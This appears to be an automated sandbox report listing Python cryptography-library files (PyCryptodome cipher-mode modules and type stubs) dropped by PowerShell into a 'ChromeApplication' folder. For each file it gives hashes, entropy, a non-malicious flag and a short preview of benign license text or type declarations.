                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11014
                                                                                                                                                                                                  Entropy (8bit):4.5201226161912444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dSMFQHvo5H4dIL3EwOOscx2JL5qwG47W9ytU4p2EVQ57T1qytU4eputAVQqWFCb0:dSCQHvAyOH2JLcOq+U46kYU4o7KCDmJ
                                                                                                                                                                                                  MD5:B28169CB2CE510E4A7D3D55FDB214DDE
                                                                                                                                                                                                  SHA1:9137A29D0D79352EBDFC04AE641F99263DF5B850
                                                                                                                                                                                                  SHA-256:813D8A9659151C4834B488257C205DBAD70BFEE9E45ED6C18CFB9B9010BF23DA
                                                                                                                                                                                                  SHA-512:2731A03C91ECA96F06E7A97DD8207B674688A4C6BD7338C124CB61FF63DE231C33237F2073592C6E4216A947419E5F1A69E8D65B1821189880B793DBC8ED283B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_cfb.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                  Entropy (8bit):4.690976940000698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
                                                                                                                                                                                                  MD5:652CF8ED15152064BFF8807277058B5A
                                                                                                                                                                                                  SHA1:D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
                                                                                                                                                                                                  SHA-256:FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
                                                                                                                                                                                                  SHA-512:2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ctr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16205
                                                                                                                                                                                                  Entropy (8bit):4.422045978034575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:d5QHvltxqH2LakMiITNEriO+gU46o2U4ozC1ShJnwBil3iYPlIidiSSZD:DeLF7AYT6o2TozWShkaSCl6
                                                                                                                                                                                                  MD5:67B5D4EFCCC2EBFD2EF0F2A0D43A0D36
                                                                                                                                                                                                  SHA1:613EB622D976517FFB544792C4331093E28237C4
                                                                                                                                                                                                  SHA-256:2CB2F14BD56381E0DB323B2E585A3803A667C37F9A852D407AB2B62E09EFBC68
                                                                                                                                                                                                  SHA-512:46C59C7ADD4B04DAE6BD85190CD1885347986F6DE4E151543D97DD2E52EFAE0817CB43C96E145CB0491BF45BDAF33BE4619D5C66FDF6015BA5F9A20905E9C5E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ctr.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):827
                                                                                                                                                                                                  Entropy (8bit):4.593860739765962
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
                                                                                                                                                                                                  MD5:8A35D43812049862067E29C878476C74
                                                                                                                                                                                                  SHA1:A12D8A91A7657976F857C769188B625FA27F0697
                                                                                                                                                                                                  SHA-256:D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
                                                                                                                                                                                                  SHA-512:18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_eax.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14861
                                                                                                                                                                                                  Entropy (8bit):4.674561793295729
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IqCwPVpgaMYO4SU4sU4pzzRWPvguXnYPR:0rskrs9Vq6wk4STsTpz1WHgi6
                                                                                                                                                                                                  MD5:DE4BA47AE12810A28473AE92C6C1B6A3
                                                                                                                                                                                                  SHA1:52749E06D5B7D25BE027F4C0BB46FED0AF52F890
                                                                                                                                                                                                  SHA-256:8643C44AB29F164FBC9F76686CE8D8203A8F9E685ACFD0F8FC22AF9643782E83
                                                                                                                                                                                                  SHA-512:9B981CE7693F99FC926C884EDEC2659DDD7B507E49F33A24B6B732D25F0B2543BE29158FE6FBFB73CEA1025324CC6EDDB2E23678981CCAFE75BBE09CFBA7B9D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_eax.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1590
                                                                                                                                                                                                  Entropy (8bit):4.436811038410909
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                                                                                  MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                                                                                  SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                                                                                  SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                                                                                  SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ecb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8529
                                                                                                                                                                                                  Entropy (8bit):4.499365740356179
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dBFQHvoWieqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWIRI:dfQHvPz8XjJYuwVkZi7Z1WIRI
                                                                                                                                                                                                  MD5:BA708C28472BF8A266985DCA4CCD93B1
                                                                                                                                                                                                  SHA1:C4E6D55A46EDEB5FDDF8A8BF15A1BA198C94815B
                                                                                                                                                                                                  SHA-256:BEB1D881C681295AE01316E857A5AB8D289A4A1B30DCF97ED405FEA5C694892A
                                                                                                                                                                                                  SHA-512:D0543D25A7AA3787CF681EBEEDEE2D9229DCB03B8D53125F7AFB40B48040E4B3F4CC912A02C86EEE1E4E2ECAD24669B89174FECC4C199BB94733B159650570A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ecb.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):611
                                                                                                                                                                                                  Entropy (8bit):4.857553785112337
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                                                                                  MD5:12949DC06561F6F7C431BFB79A4F5D05
                                                                                                                                                                                                  SHA1:68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
                                                                                                                                                                                                  SHA-256:652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
                                                                                                                                                                                                  SHA-512:5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_gcm.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21917
                                                                                                                                                                                                  Entropy (8bit):4.7218595521732905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vqjd6xv931hir4YTTTrTXWMXDR/:0r6q0j3qr5WI/
                                                                                                                                                                                                  MD5:EE69CE26FAD75A0F241475DBA3E1697C
                                                                                                                                                                                                  SHA1:23E08C68DFE560AC0124221A41D323D0410BEEEC
                                                                                                                                                                                                  SHA-256:113176FE53453C3E932E18ABFEECF654A0F87E19995DA8D84BEB0E1A85BC3027
                                                                                                                                                                                                  SHA-512:087A7577A3EEC8F1F1E058B23794F4DCFB66F4337827073F3B1563107B88637977448DF594388F77469E2072D75E48901CD0D497F276168BB9CEB173750321F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_gcm.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1586
                                                                                                                                                                                                  Entropy (8bit):4.431900531457141
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                                                                                  MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                                                                                  SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                                                                                  SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                                                                                  SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ocb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20467
                                                                                                                                                                                                  Entropy (8bit):4.484216973410615
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IRqz86WmyyJHDrlKXhf5dOvbY40S/SHfp+afbRewJse9q/bqO5f4:0rskrs9VqQqIVhhd6Y4OLe8seyZ5fhD2
                                                                                                                                                                                                  MD5:EC64CBF9BFF2B388C5D116CAFA222813
                                                                                                                                                                                                  SHA1:0EBA256BF6195A5A15DF1FE9F17AF6BF28689037
                                                                                                                                                                                                  SHA-256:3B85F66B106E11ABFF974D8C0505286D895F7A586770ED65317335CD0EEF2FD7
                                                                                                                                                                                                  SHA-512:69D0E34D535BA0C98276B862265B827F6F2C7EC5A52A77878BEBFD3F0C81E9D366DFBDA3D8BF4A28F9D672491C343CE7E40DB51E9940DF175C745B48DB89AD52
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ocb.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1267
                                                                                                                                                                                                  Entropy (8bit):4.510576229003074
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                                                                                  MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                                                                                  SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                                                                                  SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                                                                                  SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ofb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10491
                                                                                                                                                                                                  Entropy (8bit):4.4882632072003945
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:dLFQHvoPoxH4dILt52ALFxKiDqwG4rW9ytU4p2EVQ577BqotU4SputAVsqW1mYhH:d5QHv/pwADKKqO6+U46Q2U4c3amgQO
                                                                                                                                                                                                  MD5:EADCECA62EE60C2F04D2E18ADB5FB72C
                                                                                                                                                                                                  SHA1:3A40BCD84E318E1641DFFDFCF7509957DD75A997
                                                                                                                                                                                                  SHA-256:670B77041005E3E61FA2E3A80E23E454051039FE3F310C8B53A7A8F02A56B986
                                                                                                                                                                                                  SHA-512:E347FD33F158E656F5F60499D25C18B7121896190B3F4CB935F3253433CFCB038E3B46D591E203F0EF78F8F99D91D76F2FF34D2831360D199AE0E1B148F0AC65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Cipher\_mode_ofb.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):716
                                                                                                                                                                                                  Entropy (8bit):4.736539689518066
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
                                                                                                                                                                                                  MD5:AFB364F0C9ADDDBA29076577257DFC52
                                                                                                                                                                                                  SHA1:208940A0B5304122118AD8E33CB8B8AF35228146
                                                                                                                                                                                                  SHA-256:C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
                                                                                                                                                                                                  SHA-512:00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Math\_IntegerGMP.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                  Entropy (8bit):4.306529623636421
                                                                                                                                                                                                  Encrypted:false
